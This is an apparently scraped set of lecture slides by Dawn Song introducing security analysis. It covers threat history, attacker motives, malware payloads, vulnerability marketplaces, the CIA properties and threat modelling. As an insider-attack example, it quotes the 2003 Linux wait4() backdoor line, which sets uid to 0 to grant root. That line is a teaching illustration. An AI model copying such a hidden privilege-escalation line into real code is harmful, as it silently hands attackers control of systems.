Security Analysis & Threat Models Dawn Song Logistics - - PowerPoint PPT Presentation

security analysis threat models
SMART_READER_LITE
LIVE PREVIEW

Security Analysis & Threat Models Dawn Song Logistics - - PowerPoint PPT Presentation

Feb 26, 2023 455 likes •959 views

Introduction Security Analysis & Threat Models Dawn Song Logistics Sessions You can go to any sessions Project groups You can switch groups for difgerent projects Wait List Dawn Song Evolving Threats Dawn Song

slide-1
SLIDE 1

Dawn Song

Introduction

Security Analysis & Threat Models

slide-2
SLIDE 2

Dawn Song

Logistics

  • Sessions

– You can go to any sessions

  • Project groups

– You can switch groups for difgerent projects

  • Wait List
slide-3
SLIDE 3

Dawn Song

Evolving Threats

slide-4
SLIDE 4

Dawn Song

Exploration, Disruption, Personal Reputation

  • 1990s:

– Phone phreaking, free calls

  • Early 2000s:

– Email worms – CodeRed, MyDoom, Sobig

slide-5
SLIDE 5

Dawn Song

Financially Motivated

  • Shift in late 2000s
  • Spam

– Pharmaceuticals – Fake products

  • Carding/Fraud

– Identify theft, credit fraud

slide-6
SLIDE 6

Dawn Song

Politically Motivated

  • Advanced Persistent

Threats (APT)

  • Stuxnet, Flame, Gauss

– Iranian nuclear infrastructure – Lebanese banking information

slide-7
SLIDE 7

Dawn Song

Politically Motivated

slide-8
SLIDE 8

Dawn Song

Other Motives?

slide-9
SLIDE 9

Dawn Song

Threats Statistics

slide-10
SLIDE 10

Dawn Song

MITRE tracks vulnerability disclosures

Data: http://www.cvedetails.com/browse-by-date.php

# of Vulnerabilities (CVE IDs)

2010

17% 26% 12% 3% 8% 11% 3% 0% 4% 7% 4% 1% 3%

# of CVEs by T ype

DoS Code Ex ecution Overfmow Memory Corruption Sql Injection XSS Directory T raversal Http R esponse Split- ting Bypass something Gain Information Gain Privileges CSRF File Inclusion

slide-11
SLIDE 11

Dawn Song

Trends in client-side vulnerabilities

Source: IBM X-Force, Mar 2013

slide-12
SLIDE 12

Dawn Song

ireEye Advanced Thread Report 2013

slide-13
SLIDE 13

Dawn Song

IBM X-Force 2013

slide-14
SLIDE 14

Dawn Song

Mobile Threats on the Rise

slide-15
SLIDE 15

Dawn Song

Payloads---Why Attackers Compromise Machines and What Do They Do?

slide-16
SLIDE 16

Dawn Song

I: IP address and bandwidth stealing

Attacker’s goal: look like a random Internet user Use the infected machine’s IP address for:

  • Spam (e.g. the storm botnet)
  • Denial of Service:
  • Click fraud (e.g. Clickbot.a)
slide-17
SLIDE 17

Dawn Song

II: Steal user credentials

keylog for banking passwords, web passwords, gaming pwds. Example: SilentBanker (2007)

Bank

Malware injects Javascript Bank sends login page needed to log in When user submits information, also sent to attacker

User requests login page Similar mechanism used by Zeus botnet

slide-18
SLIDE 18

Dawn Song

III: Spread to isolated systems

Example: Stuxtnet Windows infection ⇒ Siemens PCS 7 SCADA control software on Windows ⇒ Siemens device controller on isolated network More on this later in course

slide-19
SLIDE 19

Dawn Song

Server-side attacks

  • Financial data theft: often credit card numbers

– example: malicious software installed on servers

  • f a

single retailer stole 45M credit card (2007)

  • Political motivation: The Sony Hack (2014),

Aurora, T unisia Facebook (Feb. 2011)

  • Infect visiting users
slide-20
SLIDE 20

Dawn Song

Insider attacks: example

Hidden trap door in Linux (nov 2003)

– Allows attacker to take over a computer – Really subtle change (uncovered via CVS logs)

Inserted a line in wait4()

if ((options == (__WCLONE|__WALL)) && (current->uid = 0)) retval = -EINVAL; See: http://lwn.net/Articles/57135/

slide-21
SLIDE 21

Dawn Song

Many more examples

  • Access to SIPRnet and a CD-RW: 260,000

cables ⇒ Wikileaks

  • SysAdmin for city of SF government.

Changed passwords, locking out city from router access

  • Insider logic bomb took down 2000 UBS servers
slide-22
SLIDE 22

Dawn Song

Monetization

slide-23
SLIDE 23

Dawn Song

Marketplace for Vulnerabilities

Option 1: bug bounty programs

  • Google Vulnerability Reward Program: $100-20,000
  • Mozilla Bug Bounty program: 3K$
  • Pwn2Own competition: 15K $
  • Github, HackerOne …

Option 2:

  • ZDI, iDefense: 2K – 25K $
slide-24
SLIDE 24

Dawn Song

Marketplace for Vulnerabilities

Option 3: black market

urce: Charlie Miller (securityevaluators.com/fjles/papers/0daymarket.pdf)

slide-25
SLIDE 25

Dawn Song

Marketplace for owned machines

Pay-per-install (PPI) services PPI operation:

  • 1. Own victim’s machine
  • 2. Download and install client’s code
  • 3. Charge client
  • urce: Cabalerro et al. (www.icir.org/vern/papers/ppi-usesec11.pdf)

spa m bot spa m bot keylogge r keylogge r

clients PPI service PPI service Victims

slide-26
SLIDE 26

Dawn Song

Marketplace for owned machines

  • urce: Cabalerro et al. (www.icir.org/vern/papers/ppi-usesec11.pdf)

spa m bot spa m bot keylogge r keylogge r

clients PPI service PPI service Victims Cost: US - 100-180$ / 1000 machines Asia - 7-8$ / 1000 machines

slide-27
SLIDE 27

Dawn Song

Why Is Security Hard?

T wo factors:

  • Lots of buggy software (and gullible users)
  • Money can be made from fjnding and

exploiting vulnerabilities

  • 1. Marketplace for vulnerabilities and exploits
  • 2. Marketplace for owned machines (PPI)
  • 3. Many methods to profjt from owned client machines
slide-28
SLIDE 28

Dawn Song

Formally Defjning Security

slide-29
SLIDE 29

Dawn Song

What is Computer Security About?

  • General goals:

– Allow intended use of computer systems – Prevent unintended use that may cause harm

  • More precisely…
slide-30
SLIDE 30

Dawn Song

Basic Security Properties (I)

  • Confjdentiality:

– Information is only disclosed to authorized people or systems – E.g., attackers cannot learn your banking info

slide-31
SLIDE 31

Dawn Song

Basic Security Properties (II)

  • Integrity:

– Information cannot be tampered with in an unauthorized way – E.g., attacker cannot change the balance of your bank account

slide-32
SLIDE 32

Dawn Song

Basic Security Properties (III)

  • Availability:

– Information and services are accessible in a timely fashion to authorized people

  • r systems

– E.g., you should be able to login and perform transactions on your online banking account when you want to

slide-33
SLIDE 33

Dawn Song

Basic Security Properties: CIA

  • Confjdentiality
  • Integrity
  • Availability
slide-34
SLIDE 34

Dawn Song

Security Analysis

  • Given a computer system, one may

ask:

Is the computer system secure?

slide-35
SLIDE 35

Dawn Song

Is the House Secure?

slide-36
SLIDE 36

Dawn Song

It Depends …

  • What are the assets? What are the

goals?

slide-37
SLIDE 37

Dawn Song

It Depends …

  • Threat model

– In SafeLand, you don’t need to lock the door – Attackers who pick locks – Attackers who drive a bull-dozer – Attackers who have super advanced technology – Attackers who may know you well

slide-38
SLIDE 38

Dawn Song

Is the House Secure?

  • Is the house’s protection mechanism

strong enough to protect the assets from attackers in a certain threat model?

slide-39
SLIDE 39

Dawn Song

Which Threat Model Should You Choose?

?

slide-40
SLIDE 40

Dawn Song

Cost of Security

  • Should you always build & evaluate a system

secure against the strongest attacker?

– A student may simply not be able to afgord an alarm system

  • Not about perfect security

Perfect Security Risk Analysis

slide-41
SLIDE 41

Dawn Song

Is the Computer System Secure?

  • Is the system’s protection

mechanism strong enough to protect the assets & achieve security goals against attackers in a certain threat model?

slide-42
SLIDE 42

Dawn Song

Key Elements to Security Analysis

Security propertie s Threat Model

?

Securit y Analysi s

slide-43
SLIDE 43

Dawn Song

Threat Model

  • Assumptions on attackers’ abilities and

resources

0Day

DDoS Network Eavesdropper MITM Attack DES Cracker

slide-44
SLIDE 44

Dawn Song

Which Threat Models to Choose?

  • For the grade database system for your class?
  • For your phone?
  • For a major online banking site?
  • For the system to control nuclear weapon launch?
slide-45
SLIDE 45

Dawn Song

Cost of Security

  • There’s no free lunch.
  • There’s no free security.
  • Cost of security

– Expensive to develop – Performance overhead – Inconvenience to users

slide-46
SLIDE 46

Dawn Song

Prioritize Your Security Solution according to Your Threat Model

  • No one wants to pay more for

security than what they have to lose

  • Not about perfect security

– Risk analysis

Perfect Security Risk Analysis

slide-47
SLIDE 47

Dawn Song

Changing Threat Model

  • Be careful when your threat model

changes

– E.g., online account

New account, nothing of value; No incentive for attackers

Over time….

Account accumulates value; More incentive for attackers

slide-48
SLIDE 48

Dawn Song

Design Impacts Cost of Security

  • Good system design & architecture can

reduce cost of security

slide-49
SLIDE 49

Dawn Song

Design Impacts Cost of Security

Browser

Known unpatched vulnerabilities

Secunia SecurityFocus Extremely critical (number /

  • ldest)

Highly critical (number /

  • ldest)

Moderately critical (number /

  • ldest)

Less critical (number /

  • ldest)

Not critical (number /

  • ldest)

T

  • tal

(number /

  • ldest)

Google Chrome 16 1 13 December 2011 Internet Explorer 6 4 17 November 2004 8 27 February 2004 12 5 June 2003 534 20 November 2000 Internet Explorer 7 1 30 October 2006 4 6 June 2006 9 5 June 2003 213 15 August 2006 Internet Explorer 8 1 26 February 2007 7 5 June 2003 123 14 January 2009 Internet Explorer 9 1 6 December 2011 26 5 March 2011 Firefox 3.6 1 20 December 2011 Firefox 9

"Vulnerabilities." SecurityFocus. Web. 18 Jan. 2012. <http://www.securityfocus.com/>. "Advisories." Secunia. Web. 18 Jan. 2012.